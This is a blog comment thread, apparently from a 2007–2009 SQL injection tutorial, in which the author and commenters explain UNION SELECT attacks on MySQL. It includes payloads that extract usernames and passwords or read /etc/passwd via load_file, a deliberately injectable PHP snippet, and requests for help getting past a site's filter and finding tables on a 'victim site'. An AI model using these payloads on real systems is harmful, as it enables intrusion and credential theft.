tag:blogger.com,1999:blog-5864808148338766272.post2784905759304183044..comments2009-10-31T15:50:30.952+01:00Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comBlogger12125tag:blogger.com,1999:blog-5864808148338766272.post-3495318967313297982009-10-31T15:50:30.952+01:002009-10-31T15:50:30.952+01:00so here is a question. You can inject on a site, however when you perform the UNION ALL SELECT 1,2,3,4/* the web application bombs to false stating that the request is forbidden (returning a false?). As per testing the web application what would be the next logical step? I have run through every case i can think of. <br /><br />The request returns true for max_allowed_packet, version and for:<br /><br />order by 1,2,3,4/* where 4 being the highest in columns. <br /><br />When entering a select, or union it gives the same error. However, when inputting the suggested LIMIT 0 Union it also bombs...? I&#39;m confused. <br /><br />The version did return true for =5 so i do know the web application is running version 5. <br /><br />More so, are there any other resources like this that i can learn from to help me along the way?<br /><br />Any suggestions would be a great help. <br /><br /><br />Thanks.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-66785696109562530182008-09-09T05:29:00.000+02:002008-09-09T05:29:00.000+02:00You will get alot more on www.unkn0wnfunk.com/forum/<BR/><BR/><BR/>Cheerspaul gillamwww.unkn0wnfunk.comnoreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-81666704265831100572008-01-08T00:06:00.000+01:002008-01-08T00:06:00.000+01:00Hi Funky, i wrote a new article about this, i hope you'll find your answer there ;)<BR/><BR/>http://devels-playground.blogspot.com/2008/01/sql-injection-getting-table-names.html<BR/><BR/>Good luck!Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-68039615706237335822008-01-05T18:10:00.000+01:002008-01-05T18:10:00.000+01:00Ahh , I'm Very Thankfull To You , But Still There's Some Prob For Me.....<BR/><BR/> I Have Learn't To How To Identify , Is The Site Is Vulnerable Or Not , By Using This Query -<BR/><BR/>news.php=12+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11/*<BR/><BR/><BR/>Ok , Now I Got The First Point...<BR/><BR/>But , I'm Really Unable To Sort To How To Get The Needed Tables From The Victim Site ?????<BR/><BR/>Just Like -<BR/><BR/>customers<BR/>orders<BR/>tbl_users<BR/>shir_user<BR/>blah_user<BR/><BR/>I Mean We Can't Just Guess These Tables ?????<BR/><BR/>How To Get Them ???<BR/><BR/><BR/>Plzz Buddy , I'm Also An Noob And Really Wana Learn....<BR/><BR/>Ur Help Will Be Appreciated.....FuNkYhttp://xxxxxxxxvipxxxxxxxx.blogspot.com/noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-43200492190002508652007-08-23T09:40:00.000+02:002007-08-23T09:40:00.000+02:00Thats right :) No problem with the 'noob' thing, everyone starts somewhere right ;)Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-33842198196216925912007-08-23T00:56:00.000+02:002007-08-23T00:56:00.000+02:00Ahh i get it now. I just thought the numbers in "SELECT 1,2" were the row numbers, when infact it is just whatever you want to add to the new row. Thanks alot for being so noob friendly :)Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-65312592983904624342007-08-22T23:38:00.000+02:002007-08-22T23:38:00.000+02:00Nope those 1,2 results can be anything you want em to be.. If the current db user would have file rights you could display the /etc/passwd file using:<BR/><BR/>SELECT page_title, page_url_id FROM page WHERE page_id = 1 LIMIT 0 union select load_file('/etc_passwd'),2;<BR/><BR/>Or anything from the database (you have read rights to) using:<BR/>SELECT page_title, page_url_id FROM page WHERE page_id = 1 LIMIT 0 union select any_column,any_column FROM any_table;<BR/><BR/>The 1's and 2's are just easy test values ;) After that the table / column guessing starts.Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-64713180868083832142007-08-22T19:08:00.000+02:002007-08-22T19:08:00.000+02:00I must admit im still a little confused. Maybe im being a little slow here, but that only shows the number id of the tables used, right? What is the next move then?<BR/><BR/>(gdamn, i feel noobish)<BR/>StevenAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-89079670055794040512007-08-22T10:03:00.000+02:002007-08-22T10:03:00.000+02:00Ah, I get your problem :) Because the union select query results are 'added' to the original query results, the column names will stay intact. The column names used in the union select directive are discarded.<BR/><BR/>Here is a simple example from the mysql command line:<BR/><BR/>(the layout is a bit mixed up, but it should help you understand ;)<BR/><BR/>mysql> select page_title, page_url_id FROM page WHERE page_id = 1;<BR/>+------------+-------------+<BR/>| page_title | page_url_id |<BR/>+------------+-------------+<BR/>| Home page | home |<BR/>+------------+-------------+<BR/>1 row in set (0.00 sec)<BR/><BR/>mysql> select page_title, page_url_id FROM page WHERE page_id = 1 LIMIT 0 union select 1,2;<BR/>+------------+-------------+<BR/>| page_title | page_url_id |<BR/>+------------+-------------+<BR/>| 1 | 2 |<BR/>+------------+-------------+<BR/>1 row in set (0.00 sec)Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-55110628526334929912007-08-22T09:44:00.000+02:002007-08-22T09:44:00.000+02:00Interesting, but there is something i still don't understand. Consider the following code:<BR/><BR/>?php<BR/>mysql_connect("localhost","root","root");<BR/>mysql_select_db("test");<BR/>$a = $_GET['a'];<BR/><BR/>$result = mysql_query("SELECT * FROM news where id =".$a);<BR/>while($row = mysql_fetch_array($result)) {<BR/>echo $row["subject"].$row["text"];<BR/>}<BR/>mysql_close();<BR/>?<BR/><BR/>I understand how you can UNION this with another table, I just dont understand how you can make it echo other vars than what was intended. I mean how can $row["subject"] ever output a username or a password? Or do you use error messages for this somehow?<BR/><BR/>StevenAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-34963690035259118702007-08-22T09:20:00.000+02:002007-08-22T09:20:00.000+02:00Hi there, thanks for the comment ;)<BR/><BR/>The point of a union select query is to overwrite the expected results with other data. So if you have a news query like the above.<BR/><BR/>SELECT * FROM `news` WHERE `news_id` = 121<BR/><BR/>And we inject the following code:<BR/>http://www.domain.com/news.php?news=121 LIMIT 0 UNION SELECT 1,username,password,4,5,6,7,8,9,10,11,12 FROM users <BR/><BR/>The actual query executed will become:<BR/>SELECT * FROM `news` WHERE `news_id` = 121 LIMIT 0 UNION SELECT 1,username,password,4,5,6,7,8,9,10,11,12 FROM users <BR/><BR/>This means it will show a username and password, instead of the news title and author.<BR/><BR/>This is a very simle example, but it shows the basic idea. You can inject SQL to get 'malicious' data from other tables, databases and sometimes you can even view server sided files using LOAD_FILE()Gnarfhttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comtag:blogger.com,1999:blog-5864808148338766272.post-28245023875015835692007-08-21T23:02:00.000+02:002007-08-21T23:02:00.000+02:00Good post, but actually i knew that :) What i don't know though is for what you can actually use a mysql injection point for (from a hackers perspective). I mean, you can't stack queries on mysql so in your "SELECT" example (which i think is the most common) you cant insert or drop anything. Infact, as far as I know you can only check if your querys are right, which means you have to do too much guessing for this to be usefull. Or am I wrong?Anonymousnoreply@blogger.com